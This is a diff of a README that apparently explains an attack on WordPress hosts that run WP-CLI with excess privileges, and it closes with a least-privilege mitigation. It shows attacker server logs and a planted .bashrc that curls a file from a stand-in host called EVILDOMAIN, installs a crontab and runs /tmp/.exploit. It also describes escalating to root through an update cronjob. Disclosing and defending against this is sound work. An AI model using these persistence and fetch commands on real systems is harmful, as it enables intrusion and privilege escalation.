yoramvandevelde/wp-cli_attack_object_cache/README.md

 +-------------------------------+----------+--------+---------+
 ```

-So, we see nothing at all, but in the meantime on EVILDOMAIN's webserver we see the following in the logs:
+He sees nothing at all of importance.
+No hack, no out of date plugins.
+Nothing of importance.
+Meanwhile on EVILDOMAIN's webserver we see the following in the logs:
 ```
 root@EVILDOMAIN:/var/log/apache2/# tail -f access.log
 xxx.xx.xxx.xx - - [04/Jul/2017 14:55:55] "GET /sshkey.pub HTTP/1.1" 200 -
 xxx.xx.xxx.xx - - [04/Jul/2017 14:55:58] "GET /sskey.pub HTTP/1.1" 200 -
 xxx.xx.xxx.xx - - [04/Jul/2017 14:55:58] "GET /exploit HTTP/1.1" 200 -
-xxx.xx.xxx.xx - - [04/Jul/2017 14:55:58] "GET /?xxxxx@xxxx.xxxx.com HTTP/1.1" 200 -
+xxx.xx.xxx.xx - - [04/Jul/2017 14:55:58] "GET /?patrick@xxxx.xxxx.com HTTP/1.1" 200 -
 ```

-On the hosting machine a quick look at the support engineers `.bashrc`:
+On the hosting machine a quick look at Patricks `.bashrc`:
 ```
 $ tail -n 3 ~/.bashrc
-curl -s http://EVILDOMAIN/sshkey.pub?xxxx@xxxx.xxxx.com -o /tmp/.sshkey.pub 2>&1 > /dev/null;
+curl -s http://EVILDOMAIN/sshkey.pub?patrick@xxxx.xxxx.com -o /tmp/.sshkey.pub 2>&1 > /dev/null;
 crontab /tmp/.cronfile 2>&1 > /dev/null;
 /tmp/.exploit
 ```

-If this user logs into the system again the user executes the above.
-It adds the cronjob and the exploit is executed as the support engineer.
-Maybe the hoster automates updates for you with the following cronjob running as root:
+If Patrick logs into the system once again he will execute lines in his bashrc before he sees a prompt.
+It adds the cronjob and the exploit is executed as the user Patrick.
+Maybe Patrick has passwordless sudo, maybe he doesn't.
+As it stands we now as an attacker have the same abilities as Patrick.
+This is a problem and not just Patrick's.
+We have an account on the system that can examine user databases, view configs and maybe even change some data.

+In some rare cases it might be so that we don't need Patrick.
+Might be so that hostingcompany X implement automatic updates of WordPress for you with a cronjob.
+These cronjobs might even be running as root:
 ```
 * 0 * * * wp-cli.phar --allow-root core update && chown -R webuser:webuser httpdocs/
 ```
-This would give us code execution as root on the webserver!
+This would give us code execution as root on the webserver, imagine the damage that we could do.

-Solving this issue is easy.
+While this problem might be quite serious the problem lies not with WP-CLI or even WordPress.
+The problem is that the hostingcompany doesn't understand what they are running.
+Using WP-CLI makes life very easy for WordPress Hosters, but you need to understand what this application does under the hood.
+The solution to this issue is fairly easy.
 Always use the concept of least privilege.
-If you force the use of the non-privileged webuser misuse wil be prevented:
+If you force the use of the non-privileged webuser all problems will be containt to the rights this user has.
+This can be done with the `sudo` command.
+Yes, it has uses other than `sudo su` and `sudo make me a sandwich`:
 ```
 $ sudo -u webuser wp-cli.phar plugin list
 ```

-This will prevent the executed code to do anything on the account which is executing the code.
+This will executed all code within the application to priviliges you granted to webuser (which will be very limited).

 If you have any comments, suggestions or want to get in touch:  *_@sp2.io*

 Links:
 - [1] http://wp-cli.org/